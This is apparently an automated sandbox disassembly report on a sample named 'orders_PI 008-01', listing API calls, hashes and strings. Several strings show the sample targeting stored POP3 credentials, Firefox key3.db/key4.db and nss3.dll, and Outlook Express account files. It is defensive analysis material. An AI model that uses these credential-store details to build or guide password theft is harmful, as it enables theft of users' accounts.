                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Item$DialogMessageSend
                                        • String ID:
                                        • API String ID: 2485852401-0
                                        • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                        • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                        • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                        • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                        APIs
                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                        • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                        • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                        • GetSysColor.USER32(0000000F), ref: 0040B472
                                        • DeleteObject.GDI32(?), ref: 0040B4A6
                                        • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteImageLoadObject$Color
                                        • String ID:
                                        • API String ID: 3642520215-0
                                        • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                        • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                        • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                        • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                        • memset.MSVCRT ref: 00405C3B
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                        • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                        • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                        • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                        • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040BB33
                                        • GetWindowRect.USER32(?,?), ref: 0040BB49
                                        • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                        • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                        • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
                                        • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                        • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                        • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                        • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                        APIs
                                        • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                        • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                        • GetDC.USER32(00000000), ref: 004072FB
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                        • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                        • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                        • String ID:
                                        • API String ID: 1999381814-0
                                        • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                        • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                        • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                        • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                        • API String ID: 1297977491-3883738016
                                        • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                        • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                        • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                        • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                        APIs
                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                        • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                        • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: gj
                                        • API String ID: 438689982-4203073231
                                        • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                        • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                        • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                        • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: __aulldvrm$__aullrem
                                        • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                        • API String ID: 643879872-978417875
                                        • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                        • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                        • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                        • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                        APIs
                                        • memset.MSVCRT ref: 0040DAE3
                                        • memset.MSVCRT ref: 0040DAF7
                                        • memset.MSVCRT ref: 0040DB0B
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset$strlen$_memicmp
                                        • String ID: user_pref("
                                        • API String ID: 765841271-2487180061
                                        • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                        • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                        • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                        • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                        • memset.MSVCRT ref: 004058C3
                                        • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                        • SetFocus.USER32(?), ref: 00405976
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                        • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                        • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                        • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                        APIs
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        • _mbscat.MSVCRT ref: 0040A8FF
                                        • sprintf.MSVCRT ref: 0040A921
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite_mbscatsprintfstrlen
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 1631269929-4153097237
                                        • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                        • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                        • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                        • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                        APIs
                                        • memset.MSVCRT ref: 0040810E
                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,7568EB20,?), ref: 004081B9
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                        • String ID: POP3_credentials$POP3_host$POP3_name
                                        • API String ID: 524865279-2190619648
                                        • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                        • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                        • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                        • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                        APIs
                                        • memset.MSVCRT ref: 00406B8E
                                        • strlen.MSVCRT ref: 00406B99
                                        • strlen.MSVCRT ref: 00406BFF
                                        • strlen.MSVCRT ref: 00406C0D
                                        • strlen.MSVCRT ref: 00406BA7
                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$_mbscat_mbscpymemset
                                        • String ID: key3.db$key4.db
                                        • API String ID: 581844971-3557030128
                                        • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                        • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                        • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                        • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                        • String ID: 0$6
                                        • API String ID: 2300387033-3849865405
                                        • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                        • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                        • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                        • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                        APIs
                                        • memset.MSVCRT ref: 004076D7
                                        • sprintf.MSVCRT ref: 00407704
                                        • strlen.MSVCRT ref: 00407710
                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                        • strlen.MSVCRT ref: 00407733
                                        • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpystrlen$memsetsprintf
                                        • String ID: %s (%s)
                                        • API String ID: 3756086014-1363028141
                                        • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                        • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                        • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                        • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                        APIs
                                        • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                        • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                        • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                        Strings
                                        • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                        • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                        • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                        • API String ID: 1640410171-3316789007
                                        • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                        • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                        • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                        • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf
                                        • String ID: %2.2X
                                        • API String ID: 125969286-791839006
                                        • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                        • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                        • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                        • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                        APIs
                                          • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                        • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                        • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                          • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                          • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                          • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                          • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                          • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                          • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                        • CloseHandle.KERNEL32(?), ref: 00444206
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                        • String ID: ACD
                                        • API String ID: 1886237854-620537770
                                        • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                        • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                        • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                        • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                        APIs
                                        • memset.MSVCRT ref: 004091EC
                                        • sprintf.MSVCRT ref: 00409201
                                          • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                          • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                          • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                        • SetWindowTextA.USER32(?,?), ref: 00409228
                                        • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
